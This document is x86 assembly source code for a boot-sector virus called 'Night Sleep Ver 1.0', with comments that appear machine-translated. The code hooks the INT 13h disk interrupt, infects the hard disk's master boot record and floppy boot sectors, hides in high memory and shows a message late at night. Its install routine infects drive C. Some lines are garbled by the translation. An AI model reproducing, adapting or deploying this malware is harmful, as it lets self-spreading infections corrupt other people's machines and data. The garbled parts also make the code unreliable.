Guided area virus
; Method: Tasm Boot.asm; TLINK BOOT.ASM;
Generate boot.exe, execution
.286
.Model small
.code
Procedures inlet parameters
; AX = memory high-end address BX = 7C00H boot program start address
The CX = 0001H indicates that the program is read from the CH (00) track CL (01) sector.
DX = 00 / 80H Represents from DX (00: A) (80: C) reads out this program
; DS = ES = SS = CS = 0 initial segment value
OFF EQU
Virussize = OFF @@ End-off @@ start
@@ start:
JMP Short @@ begin
Virusflag DB 'V'; virus logo
@@ bootdata:; there are two important data structures, can't be code
ORG 50H; Virus starts from OFFSet50H, the virus does not use the above data
@@ begin:; but other programs may be used, so they must be retained
MOV BX, 7C00H
MOV SP, BX; set SP, so that SS: sp = 0: 7C00H
STI
MOV AX, DS: [413h]; Get memory size (0: 413h unit There is a memory size of K)
Dec AX
Dec AX
MOV DS: [413H], AX; 2k in the original memory size
MOV CL, 06
SHL AX, CL; calculate high-end memory address
Mov ES, AX
XOR DI, DI
MOV Si, SP
MOV CX, Virussize
CLD
REP MOVSB; move the virus to the high address
Push AX
MOV DI, OFF @@ highaddr
Push di
RETF; jump to high end to continue
@@ highaddr:
CLI; Modify the interrupt vector, it is best to turn off
XCHG DS: [13H * 4 2], AX
MOV CS: [Oldint 13seg], AX
MOV AX, OFF @@ newint13
XCHG DS: [13H * 4], AX
MOV CS: [Oldint13off], AX; modification interrupt 13h
Push DS
POP ES; reset ES 0
CMP DL, 80H; Is it guided from a hard disk?
JZ Short @@ readyhardboot
Push DX; boot from floppy disk, infect hard disk
MOV DL, 80H
Call @@ OptDisk; calling infective modules
POP DX
@@ readydflopyboot:; Read the original floppy boot program
MOV AX, 0201H
MOV CX, 79 * 100H 17; Save the original guidance program at 0, 79 in 17 sectors during transmission
MOV DH, 00H
Call @@ Callint13
JC Short @@ ready; fail, continue to read until success
@@ EXECOLDBOOT:
CMP ES: [bx.flags], 0AA55H
JNZ @@ EXECOLDBOOT
MOV AH, 02H
INT 1AH; Take the system time
CMP CX, 22 * 100H 30; is it greater than 22:30
JB @@ EXITDISP; not, no
Lea Si, Virusmsg
@@ Dispmsg:
MOV Al, CS: [Si]
Inc Si
Mov Ah, 0eh
INT 10H; Display characters in Al
OR Al, Al
JNZ @@ Dispmsg
XOR AX, AX
INT 16H @@ EXIXISP:
MOV CX, 0001H; Restore CX initial value
Push ES
Push bx
Retf; go to the original boot program
@@ readydhardboot:
MOV AX, 0201H
MOV CX, 0002H; Save the original hard disk main boot program in 0, 0 in 2 sectors
MOV DH, 00H
Call @@ callint13; reading
JC short @@ ready; fail, continue to read until success
JMP short @@ execOLDBoot; go to the original boot program
@@ newint13:; new INT 13H (infectious block)
CMP DX, 0000H; Is it a floppy disk?
Jnz short @@ jmpoldint13
CMP AH, 02H
Jnz short @@ jmpoldint13
CMP CX, 0001H
Jnz short @@ jmpoldint13
Call @@ OptDisk; if you find a floppy district, infection floppy disk
@@ JmpoldINT13:
CLI
JMPFAR DB 0EAH; far jump instruction
Oldint13off dw?
Oldint 13seg dw?
@@ callint13:
Pushf; Simulation INT 13H Directive
Push CS
Call @@ JmpoldINT13
RET
@@ Optdisk:; DLL represented by DL (DL-0 A: 80: C)
Pusha
Push DS
Push ES; save the address and universal register
Push CS
POP ES
Push CS
POP DS; make DS = ES = CS
MOV BX, Off Oldbootspace
MOV AX, 0201H
MOV CX, 0001H
MOV DH, 00H
Call @@ Callint13; Read the original guiding sector
JC Short @@ optover
MOV DI, BX
CMP DS: [DI.VIRUSFLAG], 'V'; judgment whether there is a virus?
JZ Short @@ Optover; if there is, exit
CMP DL, 00H
JZ Short @@ isopTflopyDisk
@@ isoptharddisk:
MOV CX, 0002H; if it is a hard disk, save it in 0 side 0 2 sectors
JMP short @@ saveoldboot
@@ isopTflopyDisk:
MOV CX, 79 * 100H 17; if it is a floppy disk, save it in 17 sectors in 0, 79
@@ saveoldboot:
MOV AX, 0301H
MOV DH, 0H
Call @@ Callint13; save the original guiding sector
JC Short @@ optover
Mov Si, Off @@ start
CLD
Movsw
Movsb; modify the original sector command (JMP Near 3 bytes)
MOV DI, OFF @@ Begin 200h
Mov Si, Off @@ Begin
MOV CX, OFF @@ End-off @@ Begin
CLD
REP MOVSB; Modify the original boot sector command CX byte
MOV AX, 0301H
MOV CX, 0001H
MOV DH, 00H
Call @@ callint13; writing back the boot program that has been modified
@@ Optover:; Exit Infection POP ES
POP DS; Restore Dip and Universal Register
POPA
Ret; The following is the information to be displayed, with viral version information
Virusmsg DB 0DH, 0AH, 07H, 'Night Is Deep, You Must Go Sleep!', 0DH, 0AH, 0
DB 'Night Sleep Ver 1.0, by WHG 2001.5.5', 0
@@ End:
ORG 1FEH
Flags dw 0aa55h; guided sector effective sign
Oldbootspace DB 210H DUP (?); Defining buffer
@@ iNSTALL:
XOR AX, AX
MOV DS, AX
CLI
MOV AX, DS: [13H * 4]
MOV CS: [Oldint13off], AX
MOV AX, DS: [13H * 4 2]
MOV CS: [Oldint 13seg], AX
MOV DL, 80H
Call @@ optdisk
MOV AX, 4C00H
Int 21h
End @@ install
